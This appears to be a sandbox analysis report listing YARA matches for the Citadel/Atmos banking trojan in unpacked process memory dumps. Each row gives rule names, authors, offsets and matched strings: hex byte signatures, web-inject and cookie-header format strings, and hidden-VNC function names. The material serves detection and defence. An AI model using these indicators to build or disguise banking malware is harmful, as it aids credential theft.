2.0.sihost.exe.ac0000.0.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
2.0.sihost.exe.ac0000.0.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
2.0.sihost.exe.ac0000.0.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x53b8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x53f8:$TS1: X-TS-Rule-Name: %s 0x5420:$TS2: X-TS-Rule-PatternID: %u 0x5450:$TS3: X-TS-BotID: %s 0x5470:$TS4: X-TS-Domain: %s 0x5490:$TS5: X-TS-SessionID: %s 0x5558:$TS6: X-TS-Header-Cookie: %S 0x5588:$TS7: X-TS-Header-Referer: %S 0x55b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x55f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x5638:$TS10: X-TS-Header-UserAgent: %S 0x52e0:$VNC1: _hvnc_init@4 0x52f0:$VNC2: _hvnc_uninit@0 0x5300:$VNC3: _hvnc_start@8 0x5310:$VNC4: _hvnc_stop@0 0x5320:$VNC5: _hvnc_wait@0 0x5330:$VNC6: _hvnc_work@0 0x7efc:$WB1: nspr4.dll 0x8ee0:$WB2: nss3.dll 0x8ef4:$WB3: chrome.dll
2.0.sihost.exe.ac0000.0.unpack	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x1227f:$MZ: 4D 5A 0x123c7:$MZ: 4D 5A 0x153bd:$MZ: 4D 5A 0x1f634:$MZ: 4D 5A 0x1f674:$MZ: 4D 5A 0x3f208:$MZ: 4D 5A 0x3e8d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 AC 00 57 33 DB BF 00 28 00 00 0x3e978:$b: 68 C8 00 00 00 FF 15 4C 12 AC 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x2f820:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x2f840:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3e727:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 AC 00
2.0.sihost.exe.ac0000.0.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9148:$c: %BOTID% 0x9150:$d: %BOTNET% 0x9264:$f: bc_remove 0x9270:$g: bc_add 0x7f68:$ggurl: http://www.google.com/webhp
30.0.XRdxSzSUL8yOL.exe.2990000.1.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
30.0.XRdxSzSUL8yOL.exe.2990000.1.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
30.0.XRdxSzSUL8yOL.exe.2990000.1.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x53b8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x53f8:$TS1: X-TS-Rule-Name: %s 0x5420:$TS2: X-TS-Rule-PatternID: %u 0x5450:$TS3: X-TS-BotID: %s 0x5470:$TS4: X-TS-Domain: %s 0x5490:$TS5: X-TS-SessionID: %s 0x5558:$TS6: X-TS-Header-Cookie: %S 0x5588:$TS7: X-TS-Header-Referer: %S 0x55b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x55f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x5638:$TS10: X-TS-Header-UserAgent: %S 0x52e0:$VNC1: _hvnc_init@4 0x52f0:$VNC2: _hvnc_uninit@0 0x5300:$VNC3: _hvnc_start@8 0x5310:$VNC4: _hvnc_stop@0 0x5320:$VNC5: _hvnc_wait@0 0x5330:$VNC6: _hvnc_work@0 0x7efc:$WB1: nspr4.dll 0x8ee0:$WB2: nss3.dll 0x8ef4:$WB3: chrome.dll
30.0.XRdxSzSUL8yOL.exe.2990000.1.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9148:$c: %BOTID% 0x9150:$d: %BOTNET% 0x9264:$f: bc_remove 0x9270:$g: bc_add 0x7f68:$ggurl: http://www.google.com/webhp
10.0.SearchApp.exe.a90000.0.raw.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
10.0.SearchApp.exe.a90000.0.raw.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
10.0.SearchApp.exe.a90000.0.raw.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
10.0.SearchApp.exe.a90000.0.raw.unpack	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x12e7f:$MZ: 4D 5A 0x12fc7:$MZ: 4D 5A 0x15fbd:$MZ: 4D 5A 0x20234:$MZ: 4D 5A 0x20274:$MZ: 4D 5A 0x40808:$MZ: 4D 5A 0x3f4d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 A9 00 57 33 DB BF 00 28 00 00 0x3f578:$b: 68 C8 00 00 00 FF 15 4C 12 A9 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x30420:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x30440:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3f327:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 A9 00
10.0.SearchApp.exe.a90000.0.raw.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
30.2.XRdxSzSUL8yOL.exe.2990000.1.raw.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
30.2.XRdxSzSUL8yOL.exe.2990000.1.raw.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
30.2.XRdxSzSUL8yOL.exe.2990000.1.raw.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
30.2.XRdxSzSUL8yOL.exe.2990000.1.raw.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
27.0.backgroundTaskHost.exe.e20000.0.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
27.0.backgroundTaskHost.exe.e20000.0.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
27.0.backgroundTaskHost.exe.e20000.0.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x53b8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x53f8:$TS1: X-TS-Rule-Name: %s 0x5420:$TS2: X-TS-Rule-PatternID: %u 0x5450:$TS3: X-TS-BotID: %s 0x5470:$TS4: X-TS-Domain: %s 0x5490:$TS5: X-TS-SessionID: %s 0x5558:$TS6: X-TS-Header-Cookie: %S 0x5588:$TS7: X-TS-Header-Referer: %S 0x55b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x55f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x5638:$TS10: X-TS-Header-UserAgent: %S 0x52e0:$VNC1: _hvnc_init@4 0x52f0:$VNC2: _hvnc_uninit@0 0x5300:$VNC3: _hvnc_start@8 0x5310:$VNC4: _hvnc_stop@0 0x5320:$VNC5: _hvnc_wait@0 0x5330:$VNC6: _hvnc_work@0 0x7efc:$WB1: nspr4.dll 0x8ee0:$WB2: nss3.dll 0x8ef4:$WB3: chrome.dll
27.0.backgroundTaskHost.exe.e20000.0.unpack	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x1227f:$MZ: 4D 5A 0x123c7:$MZ: 4D 5A 0x153bd:$MZ: 4D 5A 0x1f634:$MZ: 4D 5A 0x1f674:$MZ: 4D 5A 0x3f208:$MZ: 4D 5A 0x3e8d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 E2 00 57 33 DB BF 00 28 00 00 0x3e978:$b: 68 C8 00 00 00 FF 15 4C 12 E2 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x2f820:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x2f840:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3e727:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 E2 00
27.0.backgroundTaskHost.exe.e20000.0.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9148:$c: %BOTID% 0x9150:$d: %BOTNET% 0x9264:$f: bc_remove 0x9270:$g: bc_add 0x7f68:$ggurl: http://www.google.com/webhp
29.0.RuntimeBroker.exe.ee0000.0.raw.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
29.0.RuntimeBroker.exe.ee0000.0.raw.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
29.0.RuntimeBroker.exe.ee0000.0.raw.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
29.0.RuntimeBroker.exe.ee0000.0.raw.unpack	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x12e7f:$MZ: 4D 5A 0x12fc7:$MZ: 4D 5A 0x15fbd:$MZ: 4D 5A 0x20234:$MZ: 4D 5A 0x20274:$MZ: 4D 5A 0x40808:$MZ: 4D 5A 0x3f4d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 EE 00 57 33 DB BF 00 28 00 00 0x3f578:$b: 68 C8 00 00 00 FF 15 4C 12 EE 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x30420:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x30440:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3f327:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 EE 00
29.0.RuntimeBroker.exe.ee0000.0.raw.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
32.2.XRdxSzSUL8yOL.exe.2530000.1.raw.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
32.2.XRdxSzSUL8yOL.exe.2530000.1.raw.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
32.2.XRdxSzSUL8yOL.exe.2530000.1.raw.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
32.2.XRdxSzSUL8yOL.exe.2530000.1.raw.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
31.0.XRdxSzSUL8yOL.exe.2e30000.1.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
31.0.XRdxSzSUL8yOL.exe.2e30000.1.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
31.0.XRdxSzSUL8yOL.exe.2e30000.1.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x53b8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x53f8:$TS1: X-TS-Rule-Name: %s 0x5420:$TS2: X-TS-Rule-PatternID: %u 0x5450:$TS3: X-TS-BotID: %s 0x5470:$TS4: X-TS-Domain: %s 0x5490:$TS5: X-TS-SessionID: %s 0x5558:$TS6: X-TS-Header-Cookie: %S 0x5588:$TS7: X-TS-Header-Referer: %S 0x55b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x55f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x5638:$TS10: X-TS-Header-UserAgent: %S 0x52e0:$VNC1: _hvnc_init@4 0x52f0:$VNC2: _hvnc_uninit@0 0x5300:$VNC3: _hvnc_start@8 0x5310:$VNC4: _hvnc_stop@0 0x5320:$VNC5: _hvnc_wait@0 0x5330:$VNC6: _hvnc_work@0 0x7efc:$WB1: nspr4.dll 0x8ee0:$WB2: nss3.dll 0x8ef4:$WB3: chrome.dll
31.0.XRdxSzSUL8yOL.exe.2e30000.1.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9148:$c: %BOTID% 0x9150:$d: %BOTNET% 0x9264:$f: bc_remove 0x9270:$g: bc_add 0x7f68:$ggurl: http://www.google.com/webhp
34.2.XRdxSzSUL8yOL.exe.2400000.1.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
34.2.XRdxSzSUL8yOL.exe.2400000.1.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
34.2.XRdxSzSUL8yOL.exe.2400000.1.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x53b8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x53f8:$TS1: X-TS-Rule-Name: %s 0x5420:$TS2: X-TS-Rule-PatternID: %u 0x5450:$TS3: X-TS-BotID: %s 0x5470:$TS4: X-TS-Domain: %s 0x5490:$TS5: X-TS-SessionID: %s 0x5558:$TS6: X-TS-Header-Cookie: %S 0x5588:$TS7: X-TS-Header-Referer: %S 0x55b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x55f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x5638:$TS10: X-TS-Header-UserAgent: %S 0x52e0:$VNC1: _hvnc_init@4 0x52f0:$VNC2: _hvnc_uninit@0 0x5300:$VNC3: _hvnc_start@8 0x5310:$VNC4: _hvnc_stop@0 0x5320:$VNC5: _hvnc_wait@0 0x5330:$VNC6: _hvnc_work@0 0x7efc:$WB1: nspr4.dll 0x8ee0:$WB2: nss3.dll 0x8ef4:$WB3: chrome.dll
34.2.XRdxSzSUL8yOL.exe.2400000.1.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9148:$c: %BOTID% 0x9150:$d: %BOTNET% 0x9264:$f: bc_remove 0x9270:$g: bc_add 0x7f68:$ggurl: http://www.google.com/webhp
4.0.svchost.exe.9a0000.0.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
4.0.svchost.exe.9a0000.0.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
4.0.svchost.exe.9a0000.0.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x53b8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x53f8:$TS1: X-TS-Rule-Name: %s 0x5420:$TS2: X-TS-Rule-PatternID: %u 0x5450:$TS3: X-TS-BotID: %s 0x5470:$TS4: X-TS-Domain: %s 0x5490:$TS5: X-TS-SessionID: %s 0x5558:$TS6: X-TS-Header-Cookie: %S 0x5588:$TS7: X-TS-Header-Referer: %S 0x55b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x55f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x5638:$TS10: X-TS-Header-UserAgent: %S 0x52e0:$VNC1: _hvnc_init@4 0x52f0:$VNC2: _hvnc_uninit@0 0x5300:$VNC3: _hvnc_start@8 0x5310:$VNC4: _hvnc_stop@0 0x5320:$VNC5: _hvnc_wait@0 0x5330:$VNC6: _hvnc_work@0 0x7efc:$WB1: nspr4.dll 0x8ee0:$WB2: nss3.dll 0x8ef4:$WB3: chrome.dll
4.0.svchost.exe.9a0000.0.unpack	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x1227f:$MZ: 4D 5A 0x123c7:$MZ: 4D 5A 0x153bd:$MZ: 4D 5A 0x1f634:$MZ: 4D 5A 0x1f674:$MZ: 4D 5A 0x3f208:$MZ: 4D 5A 0x3e8d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 9A 00 57 33 DB BF 00 28 00 00 0x3e978:$b: 68 C8 00 00 00 FF 15 4C 12 9A 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x2f820:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x2f840:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3e727:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 9A 00
4.0.svchost.exe.9a0000.0.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9148:$c: %BOTID% 0x9150:$d: %BOTNET% 0x9264:$f: bc_remove 0x9270:$g: bc_add 0x7f68:$ggurl: http://www.google.com/webhp
5.0.ctfmon.exe.a50000.0.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
5.0.ctfmon.exe.a50000.0.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
5.0.ctfmon.exe.a50000.0.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x53b8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x53f8:$TS1: X-TS-Rule-Name: %s 0x5420:$TS2: X-TS-Rule-PatternID: %u 0x5450:$TS3: X-TS-BotID: %s 0x5470:$TS4: X-TS-Domain: %s 0x5490:$TS5: X-TS-SessionID: %s 0x5558:$TS6: X-TS-Header-Cookie: %S 0x5588:$TS7: X-TS-Header-Referer: %S 0x55b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x55f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x5638:$TS10: X-TS-Header-UserAgent: %S 0x52e0:$VNC1: _hvnc_init@4 0x52f0:$VNC2: _hvnc_uninit@0 0x5300:$VNC3: _hvnc_start@8 0x5310:$VNC4: _hvnc_stop@0 0x5320:$VNC5: _hvnc_wait@0 0x5330:$VNC6: _hvnc_work@0 0x7efc:$WB1: nspr4.dll 0x8ee0:$WB2: nss3.dll 0x8ef4:$WB3: chrome.dll
5.0.ctfmon.exe.a50000.0.unpack	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x1227f:$MZ: 4D 5A 0x123c7:$MZ: 4D 5A 0x153bd:$MZ: 4D 5A 0x1f634:$MZ: 4D 5A 0x1f674:$MZ: 4D 5A 0x3f208:$MZ: 4D 5A 0x3e8d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 A5 00 57 33 DB BF 00 28 00 00 0x3e978:$b: 68 C8 00 00 00 FF 15 4C 12 A5 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x2f820:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x2f840:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3e727:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 A5 00
5.0.ctfmon.exe.a50000.0.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9148:$c: %BOTID% 0x9150:$d: %BOTNET% 0x9264:$f: bc_remove 0x9270:$g: bc_add 0x7f68:$ggurl: http://www.google.com/webhp
1.0.nyheukpo.exe.400000.0.unpack	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x13739:$MZ: 4D 5A 0x14cc7:$MZ: 4D 5A 0x3f208:$MZ: 4D 5A 0x3e8d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 40 00 57 33 DB BF 00 28 00 00 0x3e978:$b: 68 C8 00 00 00 FF 15 4C 12 40 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x2f820:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x2f840:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3e727:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 40 00
14.3.RuntimeBroker.exe.ab0000.0.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
15.0.smartscreen.exe.290000.0.raw.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
14.3.RuntimeBroker.exe.ab0000.0.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
2.0.sihost.exe.ac0000.0.raw.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
1.3.nyheukpo.exe.20f0000.0.raw.unpack	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x13739:$MZ: 4D 5A 0x14cc7:$MZ: 4D 5A 0x3f208:$MZ: 4D 5A 0x3e8d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 40 00 57 33 DB BF 00 28 00 00 0x3e978:$b: 68 C8 00 00 00 FF 15 4C 12 40 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x2f820:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x2f840:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3e727:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 40 00
5.3.ctfmon.exe.a50000.0.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
5.3.ctfmon.exe.a50000.0.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
5.3.ctfmon.exe.a50000.0.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x53b8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x53f8:$TS1: X-TS-Rule-Name: %s 0x5420:$TS2: X-TS-Rule-PatternID: %u 0x5450:$TS3: X-TS-BotID: %s 0x5470:$TS4: X-TS-Domain: %s 0x5490:$TS5: X-TS-SessionID: %s 0x5558:$TS6: X-TS-Header-Cookie: %S 0x5588:$TS7: X-TS-Header-Referer: %S 0x55b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x55f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x5638:$TS10: X-TS-Header-UserAgent: %S 0x52e0:$VNC1: _hvnc_init@4 0x52f0:$VNC2: _hvnc_uninit@0 0x5300:$VNC3: _hvnc_start@8 0x5310:$VNC4: _hvnc_stop@0 0x5320:$VNC5: _hvnc_wait@0 0x5330:$VNC6: _hvnc_work@0 0x7efc:$WB1: nspr4.dll 0x8ee0:$WB2: nss3.dll 0x8ef4:$WB3: chrome.dll
